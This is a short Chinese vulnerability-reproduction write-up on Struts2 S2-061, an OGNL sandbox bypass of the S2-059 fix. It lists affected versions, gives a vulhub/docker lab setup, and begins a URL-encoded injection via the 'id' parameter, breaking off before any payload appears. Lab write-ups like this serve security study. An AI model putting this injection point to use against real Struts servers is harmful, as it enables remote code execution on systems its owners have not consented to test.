简介
Struts2是一个基于MVC设计模式的Web应用框架,它本质上相当于一个servlet,在MVC设计模式中,Struts2作为控制器(Controller)来建立模型与视图的数据交互。
漏洞概述
S2-061是对S2-059的绕过,Struts2官方对S2-059的修复方式是加强OGNL表达式沙盒,而S2-061绕过了该沙盒。
影响版本
Struts 2.0.0-Struts 2.5.25
环境搭建
使用vulhub+docker环境,进入漏洞目录,启动:
/vulhub/vulhub-master/struts2/s2-061
docker-compose up -d
访问http://target-ip:8080/index.action
查看到首页:
漏洞复现
传入参数id的值(使用url编码):
?id=%